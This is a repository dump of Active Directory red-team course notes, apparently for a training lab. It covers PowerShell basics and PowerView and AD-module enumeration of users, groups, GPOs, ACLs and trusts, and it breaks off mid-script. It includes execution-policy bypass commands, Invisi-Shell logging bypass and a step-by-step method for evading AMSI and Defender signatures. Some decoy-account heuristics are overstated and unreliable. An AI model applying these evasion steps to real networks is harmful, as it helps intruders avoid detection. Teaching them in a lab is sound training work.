```
├── Course Introduction.md
├── Domain Enumeration - Part 1.md
├── Domain Enumeration - Part 2.md
├── Domain Enumeration - Part 3.md
├── Domain Enumeration - Part 4.md
├── Domain Enumeration - Part 5.md
├── Domain Persistence.md
├── Domain Privilege Escalation.md
├── Invoke-MimiEx.ps1
├── Lateral Movement.md
├── Local Privilege Escalation.md
├── Methodology.md
├── README.md
└── Trust Abuse.md
```

--------------------------------------------------------------------------------
/Course Introduction.md:
--------------------------------------------------------------------------------

# **What we will cover**

- [ ] **Introduction to Active Directory and Kerberos**
- [ ] **Introduction to PowerShell**
- [ ] **Domain Enumeration (Attacks and Defense)**
- [ ] **Trust and Privileges Mapping**
- [ ] **Local Privilege Escalation**
- [ ] **Credential Replay Attacks (Over-Pass-The-Hash, Token Replay etc.)**
- [ ] **Domain Privilege Escalation (Attacks and Defense)**
- [ ] **Dumping System and Domain Secrets**
- [ ] **Kerberos Attacks and Defense (Golden, Silver tickets and more)**
- [ ] **Abusing Cross Forest Trusts (Attacks and Defense)**
- [ ] **Delegation Issues**
- [ ] **Persistence Techniques**
- [ ] **Abusing SQL Server Trusts in an AD Environment**
- [ ] **Bypassing Defenses**

# **Our End Goal**

- [ ] **Basic prior knowledge of Active Directory is needed**
- [ ] **Demonstrate how an attack can be executed, then use learning objectives to practice what we have learnt**
- [ ] **The lab focuses on real-world red team operations using built-in tools and on functionality abuse**
- [ ] **No exploits or exploitation frameworks are needed**
- [ ] **We start from a foothold box as a normal domain user and work up to Domain Admin**

# **Philosophy of This Course**

- [ ] **We will emulate an adversary who has a foothold machine on the target domain**
- [ ] **We will not use any exploit**
- [ ] **We will try to abuse functionality and features which are rarely patched**
- [ ] **We try to use built-in tools, avoid touching disk on any target, and will not use an exploitation framework throughout the lessons**

# **What is Active Directory**

- [ ] A directory service used to manage Windows networks
- [ ] Stores information about objects on the network and makes it easily accessible to users and admins
- [ ] Enables centralized, secure management of an entire network across a building, a city or multiple locations throughout the world

# **Active Directory Components**

- [ ] Schema - Defines objects and their attributes
- [ ] Query and index mechanism - Provides searching and publication of objects and their properties
- [ ] Global catalog - Contains information about every object in the directory
- [ ] Replication service - Distributes information across domain controllers

![](https://i.imgur.com/gurz65j.png)

# **Active Directory Structure**

- [ ] Forests, domains and Organizational Units are the basic building blocks of the Active Directory structure

![](https://servergeeks.files.wordpress.com/2012/10/ad-1.jpg)

# **What is PowerShell?**

- [ ] Provides access to almost everything in a Windows platform and Active Directory environment
- [ ] More useful for an attacker
- [ ] Provides the capability of running powerful scripts completely from memory, making it ideal for foothold shells/boxes
- [ ] Easy to learn and really powerful
- [ ] Based on the **.NET** framework and tightly integrated with Windows

# **PowerShell Help System**

- Show help message and exit

```powershell
$ Get-Help
$ Help
$ <cmdlet> -?
```

- Supports wildcards.
- Comes with various options and filters.
- Get help for conceptual topics:

```powershell
$ Get-Help About_
```

- List everything about the help topics

```powershell
$ Get-Help *
```

- List everything that contains the word **process**

```powershell
$ Get-Help process
```

![](https://i.imgur.com/Xbqgted.png)

- Update the help system:

```powershell
$ Update-Help
```

- List full help about a topic (the `Get-Item` cmdlet in this case)

```powershell
$ Get-Help Get-Item -Full
```

- List examples of how to run a cmdlet (the `Get-Item` cmdlet in this case)

```powershell
$ Get-Help Get-Item -Examples
```

# **What are PowerShell Cmdlets**

- They are used to perform an action, and a **.NET** object is returned as the output.
- They accept parameters for different operations
- They have aliases
- They are NOT executables and can be written with a few lines of script

- To list all cmdlets:

```powershell
$ Get-Command -CommandType cmdlet
```

- There are many cmdlets useful from an attacker's perspective; for example `Get-Process` lists the processes running on a system.
![](https://i.imgur.com/r08A5q7.png)

**Reference:** [https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.3](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.3)

# **PowerShell Scripts**

- Use cmdlets, native commands, functions, .NET, DLLs, the Windows API and much more in a single **program**
- PowerShell scripts are really powerful and can do a lot in few lines
- Easy syntax

## **ISE**

- It is a GUI editor/scripting environment
- Tab completion, context-sensitive help, syntax highlighting, selective execution and in-line help are some useful features
- Comes with a handy console pane to run commands from the ISE

## **Execution Policy**

By default, running PowerShell scripts on a box after foothold might be blocked by the **Execution Policy**

- It is not a security measure; it exists to prevent users from accidentally executing scripts.
- Several ways to bypass it

```powershell
$ powershell -ExecutionPolicy bypass
$ powershell -c <command>
$ powershell -EncodedCommand <base64-encoded command>
$ $env:PSExecutionPolicyPreference="bypass"
```

**Reference:** [https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/)

# **PowerShell Modules**

- **PowerShell** also supports modules
- A module can be imported with:

```powershell
$ Import-Module <modulepath>
```

- All the commands in a module can be listed with:

```powershell
$ Get-Command -Module <modulename>
```

# **PowerShell Script Execution**

![](https://i.imgur.com/mnJMOA1.png)

# **PowerShell and AD**

PowerShell and Active Directory integration:

- [ADSI]
- .NET classes: `System.DirectoryServices.ActiveDirectory`
- Native executables
- PowerShell (.NET classes and WMI)

# **Methodology - Assume Breach**

- Insider attack simulation is an important part of the assume breach execution cycle.
- The assume breach methodology will be used on an AD environment, using the internal access available to an adversary to perform further attacks

![](https://i.imgur.com/YBUBDUg.png)

# **Insider Attack Simulation**

- **Recon** - Gather IP addresses, hostnames etc.
- **Domain Enumeration** - Enumerate domains for shares, usernames etc.
- **Local Privilege Escalation** - Moving from a lower-privileged user to a higher-privileged user
- **Admin Reconnaissance** - Once we have enough rights and knowledge we start to dig deep
- **Lateral Movement** - We check whether we have access to any other machines with trusted privileges
- **Domain Admin privileges**
- **Cross Trust Attacks** - We escalate privileges from **domain** admin to **enterprise** admin and then to a different trusted forest
- **Persist and Exfiltrate** - We try as much as possible to maintain access while extracting data

![](https://i.imgur.com/lu6j7Eh.png)

# **The Lab Environment**

![](https://i.imgur.com/WTDzOE2.png)

--------------------------------------------------------------------------------
/Domain Enumeration - Part 1.md:
--------------------------------------------------------------------------------

# **What is Domain Enumeration?**

- Once we have a foothold on the target machine
- We will try to map out the various entities, trusts, ACLs, relationships and privileges of the target domain
- The enumeration can be done using native executables and **.NET** classes in PowerShell

# **Enumerating Domain**

- To check the DC, parent, forest etc.:

```powershell
$ $ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ $ADClass::GetCurrentDomain()
```

To check the current user's privileges use:

```powershell
$ whoami /priv
```

- To speed things up we can use PowerView:

https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

- The Active Directory PowerShell module comes in handy as it is less likely to be detected by AV

https://4sysops.com/wiki/how-to-install-the-powershell-active-directory-module/

- To use the ActiveDirectory module without installing **Remote Server Administration Tools** (RSAT), we can `Import-Module` the ActiveDirectory module DLL directly:

https://github.com/samratashok/ADModule

## **Importing Modules into PowerShell**

### **PowerView module**

First of all download the PowerView `.ps1` file from the link above

- Change directory to where the module is located and dot-source the PowerView script so its functions are loaded into the session

```powershell
$ cd C:\AD\Tools
$ . .\PowerView.ps1
```

**_Example:_**

![](https://i.imgur.com/64RjZRZ.png)

### **Active Directory PowerShell module**

Download both files (`.dll` and `.psd1`) from samratashok's GitHub repository linked above

- Import `Microsoft.ActiveDirectory.Management.dll`

```powershell
$ cd C:\AD\Tools\ADmodule-master
$ Import-Module .\Microsoft.ActiveDirectory.Management.dll
```

- Import `ActiveDirectory.psd1`

```powershell
$ Import-Module .\ActiveDirectory\ActiveDirectory.psd1
```

**_Example:_**

![](https://i.imgur.com/ugWzM3j.png)

**Sometimes we might need to bypass the Antimalware Scan Interface (AMSI) before we can load these modules; here is how to do that:**

# **Bypassing PowerShell Security**

- We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for bypassing the security controls in PowerShell.
- The tool hooks the .NET assemblies (System.Management.Automation.dll and System.Core.dll) to bypass logging
- It uses the CLR Profiler API to perform the hook.
- "A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."

## **How to use**

Using Invisi-Shell

- With admin privileges run:

```powershell
$ RunWithPathAsAdmin.bat
```

- With non-admin privileges:

```powershell
$ RunWithRegistryNonAdmin.bat

# Always use this one, since it is a bit quieter,
# regardless of admin or non-admin privileges
```

- Type `exit` from the new `PowerShell` session to complete the clean-up.

# **Bypassing AV Signatures for PowerShell**

- We can always load scripts in memory and avoid detection using an AMSI bypass
- How do we bypass signature-based detection of on-disk PowerShell scripts by Windows Defender?
- We can use the AMSITrigger (https://github.com/RythmStick/AMSITrigger) tool to identify the exact part of a script that is detected.
- We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary / file that Windows Defender may flag.
- Simply provide the path to the script file to scan it:

```powershell
$ AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
$ DefenderCheck.exe PowerUp.ps1
```

- For full obfuscation of PowerShell scripts, see Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation). That is what is used for obfuscating the AMSI bypass in the course!
## **Steps to avoid signature-based detection are pretty simple:**

1. Scan using AMSITrigger
2. Modify the detected code snippet
3. Rescan using AMSITrigger
4. Repeat steps 2 & 3 till we get the result **"AMSI_RESULT_NOT_DETECTED"** or **"Blank"**.

**_Example:_**

- Scan using `AMSITrigger`

![](https://i.imgur.com/h5qjJAE.png)

- Reverse the **"System.AppDomain"** string on line number 59

```powershell
$String = 'niamoDppA.metsyS'
$classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
$AppDomain = [Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('CurrentDomain').GetValue($null, @())
```

- Check again with `AMSITrigger`

![](https://i.imgur.com/sC7X1g7.png)

> Make sure to check the PDF for more examples

## **Enumerating Domain with PowerView and Active Directory Module**

**_Note:_** If one doesn't work then the other will; you know the difference between both as stated earlier

- Get current domain

```powershell
$ Get-Domain # PowerView
$ Get-ADDomain # ActiveDirectory Module
```

- Get object of another domain

```powershell
$ Get-Domain -Domain moneycorp.local # PowerView
$ Get-ADDomain -Identity moneycorp.local # AD Module
```

- Get domain SID for the current domain

```powershell
$ Get-DomainSID # PowerView
$ (Get-ADDomain).DomainSID # AD module
```

- Get domain policy for the current domain

```powershell
$ Get-DomainPolicyData # PowerView
$ (Get-DomainPolicyData).systemaccess # PowerView
```

**_Example:_**

![](https://i.imgur.com/IXElkMe.png)

- Get domain policy for another domain

```powershell
$ (Get-DomainPolicy -domain moneycorp.local).systemaccess # PowerView
```

- Get Kerberos policy

```powershell
$ (Get-DomainPolicy)."Kerberos Policy" # PowerView
```

> This is useful if we want to carry out an attack like **Golden Tickets**, as it makes sense to enumerate the **Kerberos** policy first

- Get domain controllers for the current domain

```powershell
$ Get-DomainController # PowerView
$ Get-ADDomainController # AD module
```

- Get domain controllers for another domain

```powershell
$ Get-DomainController -Domain moneycorp.local # PowerView
$ Get-ADDomainController -DomainName moneycorp.local -Discover # AD module
```

> Once we have interesting information/details about the domain controller, we can start going after the users

- Get a list of users in the current domain

```powershell
# PowerView
$ Get-DomainUser
$ Get-DomainUser -Identity student1

# Active Directory Module
$ Get-ADUser -Filter * -Properties *
$ Get-ADUser -Identity student1 -Properties *
```

We can also pick out properties by piping (`|`) what we want to the `select` command, e.g.:

```powershell
# PowerView
# output only the "cn" property of each user
$ Get-DomainUser | select cn

# AD module
# output only the "Name" property of each user
$ Get-ADUser -Filter * -Properties * | select Name
```

These are what we call properties:

![](https://i.imgur.com/ycv4kYe.png)

- Get list of all properties for users in the current domain

```powershell
# PowerView
$ Get-DomainUser -Identity student1 -Properties *
$ Get-DomainUser -Properties samaccountname,logonCount

# AD module
$ Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
$ Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
```

Enumerating **properties** is a very important phase when performing Active Directory attacks; here are a few properties you should consider using in `PowerView`:

```powershell
# PowerView
$ Get-DomainUser -Properties pwdlastset
$ Get-DomainUser -Properties badpwdcount
$ Get-DomainUser -Properties logoncount
```

**pwdlastset**: The `pwdlastset` property stores the date and time when the user's password was last changed. The older the time of change, the higher the chance the account is a decoy. Take note!

![](https://i.imgur.com/apx9rn0.png)

**badpwdcount**: The `badPwdCount` property specifies the number of times the user tried to log on to the account using an incorrect password. Any user with a 0 or low count is definitely a decoy, because they have no incorrect logon attempts.

![](https://i.imgur.com/0qyltCP.png)

**logoncount**: This attribute specifies the number of times that the account has successfully logged on. A value of 0 indicates that the value is unknown.

![](https://i.imgur.com/Txuo0A4.png)

- Search for a particular string in a user's attributes:

```powershell
# PowerView
$ Get-DomainUser -LDAPFilter "(Description=*built*)" | Select name,Description

# AD Module
$ Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description
```

> **Note:** We are not limited to the keyword **"built"** in the filter; we can search for keywords like **"Password"**, **"Username"**, **"Secrets"** etc.

--------------------------------------------------------------------------------
/Domain Enumeration - Part 2.md:
--------------------------------------------------------------------------------

# **Domain Enumeration Cont'd**

**Make sure to download/import both PowerView and the AD Module first from the links shown in Domain Enumeration - Part 1**

- Get a list of computers in the current domain

```powershell
# PowerView
$ Get-DomainComputer | select Name
$ Get-DomainComputer -OperatingSystem "*Server 2016*"
$ Get-DomainComputer -Ping
$ Get-DomainComputer -FullData

# AD Module
$ Get-ADComputer -Filter * | select Name
$ Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
$ Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
$ Get-ADComputer -Filter * -Properties *
```

**_Example:_**

![](https://i.imgur.com/vmBif3X.png)

- Get all the groups in the current domain

```powershell
# PowerView
$ Get-DomainGroup # lists all domain groups
$ Get-DomainGroup -Domain <targetdomain>
$ Get-DomainGroup -FullData # lists all group properties in a domain

# AD Module
$ Get-ADGroup -Filter * | select Name
$ Get-ADGroup -Filter * -Properties *
```

- Get all groups containing the word "admin" in the group name

```powershell
# PowerView
$ Get-DomainGroup *admin*

# AD Module
$ Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
```

- Get all the members of the Domain Admins and Enterprise Admins groups

```powershell
# PowerView
$ Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Domain admins
$ Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse # Enterprise admins

# test the below command also
# Get-DomainGroupMember -Identity "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members

# AD Module
$ Get-ADGroupMember -Identity "Domain Admins" -Recursive # Domain admins
$ Get-ADGroupMember -Identity "Enterprise Admins" -Recursive # Enterprise admins
```

**_Example:_**

![](https://i.imgur.com/nYGNRo8.png)

> **Note:** The `IsGroup` property tells us that these two domain admins are user accounts rather than nested groups. Also, it does not matter what the `MemberName` property is: if the `MemberSID` is available, its **RID** (the last part of the SID; ask Google for more info!) is the identifier telling us who this account is. It might be the Administrator account with a different/changed member name, but if you check the **RID** and it is "500" then it is the Administrator account.

- Get the group membership for a user:

Run `whoami` first to check the current username

```powershell
$ whoami
marvel\fcastle
```

Now get the group membership for that username

```powershell
# PowerView
$ Get-DomainGroup -UserName "fcastle"

# AD Module
$ Get-ADPrincipalGroupMembership -Identity fcastle
```

> **Note:** If you see an **RID** then it is a built-in group; if there is no **RID** then it isn't a built-in group

![](https://i.imgur.com/5k973U5.png)

- List all the local groups on a machine (needs administrator privs on non-DC machines)

```powershell
# PowerView
$ Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups
```

- Get members of all the local groups on a machine (needs administrator privs on non-DC machines)

```powershell
# PowerView
$ Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse
```

- Get members of the local group "Administrators" on a machine (needs administrator privs on non-DC machines):

```powershell
# PowerView
$ Get-NetLocalGroupMember -ComputerName dcorp-dc -GroupName Administrators
```

- Get actively logged-on users on a computer (needs local admin rights on the target)

```powershell
# PowerView
$ Get-NetLoggedon -ComputerName dcorp-adminsrv
```

- Get locally logged-on users on a computer (needs remote registry on the target - started by default on server OS)

```powershell
# PowerView
$ Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

- Get the last logged-on user on a computer (needs administrative rights and remote registry on the target)

```powershell
# PowerView
$ Get-LastLoggedon -ComputerName dcorp-adminsrv
```

- Find shares on hosts in the current domain

```powershell
# PowerView
$ Invoke-ShareFinder -Verbose # print all shares
$ Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC # remove default shares from output

# there is a high chance we can access some of the shares in the output
```
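The user attributes from Part 1 (`pwdlastset`, `badpwdcount`, `logoncount`) and the group membership and RID 500 points above can be combined into a single review of a privileged group. The script below is an added example written for these notes, not code from the course or from PowerView: it uses only the ActiveDirectory module, and the function name `Get-PrivilegedAccountReport` and the 90-day staleness threshold are my own choices.

```powershell
# Added example for these notes (not course or PowerView code): review the
# members of a privileged group with the ActiveDirectory module only.
# Assumes the AD module is loaded and the caller can read user attributes.
Import-Module ActiveDirectory

function Get-PrivilegedAccountReport {
    param(
        [string]$GroupName = 'Domain Admins',  # group to review
        [int]$StaleDays    = 90                # password age that counts as stale (my choice)
    )

    # -Recursive walks nested groups, so members of sub-groups are included too
    $members = Get-ADGroupMember -Identity $GroupName -Recursive |
        Where-Object { $_.objectClass -eq 'user' }

    foreach ($m in $members) {
        $u = Get-ADUser -Identity $m.DistinguishedName -Properties pwdLastSet, badPwdCount, logonCount

        # The RID is the last sub-authority of the SID. RID 500 is always the
        # built-in Administrator account, whatever it has been renamed to.
        $rid = [int]($u.SID.Value.Split('-')[-1])

        # pwdLastSet is a Windows FILETIME; 0 means "must change password at next logon"
        $pwdSet = if ($u.pwdLastSet -gt 0) { [datetime]::FromFileTimeUtc($u.pwdLastSet) } else { $null }
        $pwdAge = if ($pwdSet) { [int]((Get-Date).ToUniversalTime() - $pwdSet).TotalDays } else { $null }

        [pscustomobject]@{
            SamAccountName = $u.SamAccountName
            Enabled        = $u.Enabled
            RID            = $rid
            IsBuiltinAdmin = ($rid -eq 500)
            PwdLastSetUtc  = $pwdSet
            PwdAgeDays     = $pwdAge
            PwdStale       = ($null -ne $pwdAge -and $pwdAge -gt $StaleDays)
            BadPwdCount    = $u.badPwdCount
            LogonCount     = $u.logonCount
        }
    }
}

# Usage: review Domain Admins, oldest passwords first
Get-PrivilegedAccountReport -GroupName 'Domain Admins' |
    Sort-Object PwdAgeDays -Descending |
    Format-Table -AutoSize
```

`badPwdCount` and `logonCount` are not replicated between domain controllers, so the numbers reflect whichever DC answered the query; re-run with `-Server` against each DC if those values matter for a decision. Disabled members of a privileged group, and a RID 500 account with a stale password, are the rows a defender would act on first.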
- Find sensitive files on computers in the domain

```powershell
# PowerView
$ Invoke-FileFinder -Verbose
```

- Get all file servers of the domain

```powershell
# PowerView
$ Get-NetFileServer -Verbose # looks for high-value targets
```

# **Learning Objective 1**

- [ ] Enumerate the following for the dollarcorp domain:
  - Users
  - Computers
  - Domain Administrators
  - Enterprise Administrators
  - Shares

## **Solution**

**_Coming Soon_**

--------------------------------------------------------------------------------
/Domain Enumeration - Part 3.md:
--------------------------------------------------------------------------------

# **Domain Enumeration Cont'd - GPO (PowerView)**

## **What is Group Policy?**

- Group Policy provides the ability to manage configuration and changes easily and centrally in AD.
- Allows configuration of:
  - Security settings
  - Registry-based policy settings
  - GPO preferences like startup/shutdown/logon/logoff script settings
  - Software installation
- GPOs can be abused for various attacks like privilege escalation, backdoors, persistence etc.

**Using `PowerView` we can get some interesting information from the GPOs**

- Get list of GPOs in the current domain

```powershell
$ Get-DomainGPO # get list of all Group Policy Objects
$ Get-DomainGPO -ComputerIdentity dcorp-student1.dollarcorp.moneycorp.local
```

We can also filter with:

```powershell
$ Get-DomainGPO | select displayname
```

> **Note:** The **Default Domain Policy** and **Default Domain Controllers Policy** are default GPOs, so we should really focus on the ones that come after them.
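A GPO listing on its own does not tell you where each policy applies. The link between a container and its GPOs lives in the container's `gPLink` attribute, and the following added example (written for these notes, not course or PowerView code) resolves that attribute for the domain root and every OU using the ActiveDirectory module. The function name `Get-GpoLinkMap` and the `StudentMachines` filter in the usage line are my own; the `gPLink` string format and the link-option bits are the documented ones.

```powershell
# Added example for these notes (not course or PowerView code): list the GPOs
# linked to the domain root and every OU by parsing the gPLink attribute,
# using the ActiveDirectory module. Function name is my own.
Import-Module ActiveDirectory

function Get-GpoLinkMap {
    # Containers that can carry GPO links: the domain root plus all OUs
    $containers = @()
    $containers += Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties gPLink
    $containers += Get-ADOrganizationalUnit -Filter * -Properties gPLink

    foreach ($c in $containers) {
        if ([string]::IsNullOrEmpty($c.gPLink)) { continue }

        # gPLink is a string of "[LDAP://<GPO DN>;<options>]" entries. The first
        # entry has the highest precedence. Option bit 0 = link disabled, bit 1 = enforced.
        $links = [regex]::Matches($c.gPLink, '\[LDAP://(?<dn>[^;]+);(?<opt>\d+)\]')
        $order = 0
        foreach ($l in $links) {
            $order++
            $opt = [int]$l.Groups['opt'].Value
            $gpo = Get-ADObject -Identity $l.Groups['dn'].Value -Properties displayName, gPCFileSysPath

            [pscustomobject]@{
                Container  = $c.DistinguishedName
                LinkOrder  = $order
                GpoName    = $gpo.displayName
                GpoGuid    = $gpo.Name            # the {GUID} you would pass to Get-DomainGPO -Identity
                Enforced   = [bool]($opt -band 2)
                Disabled   = [bool]($opt -band 1)
                SysvolPath = $gpo.gPCFileSysPath  # where the policy files live on SYSVOL
            }
        }
    }
}

# Usage: show what is linked to a particular OU (OU name taken from the lab; adjust to your domain)
Get-GpoLinkMap | Where-Object { $_.Container -like 'OU=StudentMachines,*' } | Format-Table -AutoSize
```

Running it without the `Where-Object` gives the full link map of the domain, which is the quickest way to spot a non-default GPO linked at the root or enforced on an OU that holds sensitive machines.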
- Get GPO(s) which use Restricted Groups or `groups.xml` for interesting users

```powershell
$ Get-DomainGPOLocalGroup
```

- Get users which are in a local group of a machine using GPO

```powershell
$ Find-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-student505.dollarcorp.moneycorp.local
```

- Get machines where the given user is a member of a specific group

```powershell
$ Find-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose
```

# **Domain Enumeration - Organizational Units (OU)**

- Get OUs in a domain

```powershell
$ Get-DomainOU
```

- Get the GPO applied on an OU. Read the GPO name from the `gplink` attribute returned by `Get-NetOU` (`Get-DomainOU`)

First of all run

```powershell
$ Get-DomainOU
```

Now copy the GPO GUID of the OU you want to extract machines from

![](https://i.imgur.com/DGySe2D.png)

Then run

```powershell
$ Get-DomainGPO -Identity "{AB306569-220D-43FF-B03B-83E8F4EF8081}"
```

# **Learning Objective 2**

- [ ] Enumerate the following for the dollarcorp domain
  - List all the OUs
  - List all the computers in the StudentMachines OU.
  - List all the GPOs
  - Enumerate the GPO applied on the StudentMachines OU

## **Solution**

**_Coming Soon_**

# **Domain Enumeration Cont'd - ACL**

## **What is an Access Control Model (ACL)?**

- [ ] Enables control over the ability of a process to access objects and other resources in Active Directory based on:
  - Access Tokens (security context of a process - identity and privileges of the user)
  - Security Descriptors (SID of the owner, Discretionary ACL (DACL) and System ACL (SACL))

## **Enumerating ACLs**

- Get the ACLs associated with the specified object

```powershell
# PowerView
$ Get-DomainObjectAcl -SamAccountName student1 -ResolveGUIDs
```

**_Example:_**

![](https://i.imgur.com/sNgi5yP.png)

> Note that there are 3 major properties we should look out for. The `ObjectDN` identifies the target object, in this case `CN=student1`. Then the `IdentityReference` states which principal has permissions, followed by the `ActiveDirectoryRights` that states the permissions the **IdentityReference** principal has.
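The three properties just described are also what an ACL audit filters on. The script below is an added example written for these notes, not course or PowerView code: it reads an object's DACL through the ActiveDirectory module's `AD:` drive and keeps only the `Allow` entries that grant modify-type rights to principals outside a short expected list. The function name `Get-InterestingObjectAcl`, the rights pattern and the expected-principal list are my own choices, and, as noted above for the AD module, the `ObjectType` GUID is left unresolved.

```powershell
# Added example for these notes (not course or PowerView code): list non-default
# ACEs that grant modify-type rights on an AD object, via the AD: drive.
# Assumes the AD module is loaded and the caller can read the object's security descriptor.
Import-Module ActiveDirectory

# Rights that allow taking over or altering an object or its DACL (my selection).
$script:DangerousRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

# Principals that normally hold these rights; anything else is worth a look (my selection).
$script:ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
    '*\Domain Admins', '*\Enterprise Admins'
)

function Get-InterestingObjectAcl {
    param([Parameter(Mandatory)][string]$DistinguishedName)

    $acl   = Get-Acl -Path "AD:\$DistinguishedName"
    $owner = $acl.Owner   # the owner can always rewrite the DACL, so report it too

    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.ActiveDirectoryRights -match $script:DangerousRights
        } |
        Where-Object {
            $id = $_.IdentityReference.Value
            -not ($script:ExpectedPrincipals | Where-Object { $id -like $_ })
        } |
        ForEach-Object {
            [pscustomobject]@{
                ObjectDN          = $DistinguishedName
                Owner             = $owner
                IdentityReference = $_.IdentityReference.Value
                Rights            = $_.ActiveDirectoryRights
                ObjectType        = $_.ObjectType   # GUID of the property/extended right, all-zero = whole object
                IsInherited       = $_.IsInherited
            }
        }
}

# Usage: audit the Domain Admins group object
$da = (Get-ADGroup -Identity 'Domain Admins').DistinguishedName
Get-InterestingObjectAcl -DistinguishedName $da | Format-Table -AutoSize
```

Inherited entries come from the parent container or the domain root, so an unexpected row with `IsInherited = True` means the fix belongs higher up the tree; the `ObjectType` GUID can be mapped to a property or extended-right name through the schema, which is what PowerView's `-ResolveGUIDs` does for you.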
- Get the ACLs associated with the specified prefix to be used for search

```powershell
# PowerView
$ Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
```

- We can also enumerate ACLs using the **ActiveDirectory** module, but without resolving GUIDs

```powershell
# AD Module
$ (Get-Acl "AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local").Access
```

- Get the ACLs associated with the specified LDAP path to be used for search

```powershell
# PowerView
$ Get-DomainObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
```

- Search for interesting ACEs

```powershell
# PowerView
$ Find-InterestingDomainAcl -ResolveGUIDs
```

- Get the ACLs associated with the specified path

```powershell
# PowerView
$ Get-PathAcl -Path "\\dc.mydomain.local\sysvol"
```

# **Learning Objective 3**

- [ ] Enumerate the following for the dollarcorp domain:
  - ACL for the Users group
  - ACL for the Domain Admins group
  - All modify rights/permissions for the student

## **Solution**

**_Coming Soon_**

--------------------------------------------------------------------------------
/Domain Enumeration - Part 4.md:
--------------------------------------------------------------------------------

# **Domain Enumeration Cont'd - Trusts**

## **What are Trusts?**

- A trust is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest.
- Trusts can be automatic (parent-child, same forest etc.) or established (forest, external).
- Trusted Domain Objects (TDOs) represent the trust relationships in a domain

## **Trust Direction**

**_One-Way Trust:_**

![](https://i.imgur.com/rty5NIl.png)

**_Two-Way Trust:_**

![](https://i.imgur.com/XJ1nq9T.png)

**For more information on trusts, view the learning material**

- Get a list of all domain trusts for the current domain

```powershell
# PowerView
$ Get-DomainTrust
$ Get-DomainTrust -Domain us.dollarcorp.moneycorp.local

# AD Module
$ Get-ADTrust -Filter *
$ Get-ADTrust -Identity us.dollarcorp.moneycorp.local
```

- Get details about the current forest

```powershell
# PowerView
$ Get-Forest
$ Get-Forest -Forest eurocorp.local

# AD Module
$ Get-ADForest
$ Get-ADForest -Identity eurocorp.local
```

- Get all domains in the current forest

```powershell
# PowerView
$ Get-ForestDomain
$ Get-ForestDomain -Forest eurocorp.local

# AD Module
$ (Get-ADForest).Domains
```

- Get all global catalogs for the current forest

```powershell
# PowerView
$ Get-ForestGlobalCatalog
$ Get-ForestGlobalCatalog -Forest eurocorp.local
```

- Map trusts of a forest (no forest trusts in the lab)

```powershell
# PowerView
$ Get-ForestTrust
$ Get-ForestTrust -Forest eurocorp.local
```

# **Learning Objective 4**

- Enumerate all domains in the moneycorp.local forest.
- Map the trusts of the dollarcorp.moneycorp.local domain.
- Map external trusts in the moneycorp.local forest.
- Identify external trusts of the dollarcorp domain. Can you enumerate trusts for a trusting forest?
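The commands above query one domain at a time. Since TDOs are stored per domain, a complete trust map of a forest means walking `(Get-ADForest).Domains` and asking each domain for its trusts. The script below is an added example written for these notes (not the course's solution to the objective and not PowerView code); it uses only the ActiveDirectory module, and the function name `Get-ForestTrustMap` is my own.

```powershell
# Added example for these notes (not course or PowerView code): map every trust
# of every domain in a forest using the ActiveDirectory module.
# Assumes the AD module is loaded and each domain's DCs are reachable.
Import-Module ActiveDirectory

function Get-ForestTrustMap {
    param([string]$Forest)   # optional forest name; default is the current forest

    $f = if ($Forest) { Get-ADForest -Identity $Forest } else { Get-ADForest }

    foreach ($domain in $f.Domains) {
        # Trusts are stored as TDOs in each domain, so query each domain directly
        Get-ADTrust -Filter * -Server $domain | ForEach-Object {
            [pscustomobject]@{
                Source               = $domain
                Target               = $_.Target
                Direction            = $_.Direction          # Inbound / Outbound / BiDirectional
                IntraForest          = $_.IntraForest        # parent-child or tree-root trust
                ForestTransitive     = $_.ForestTransitive   # true for forest trusts
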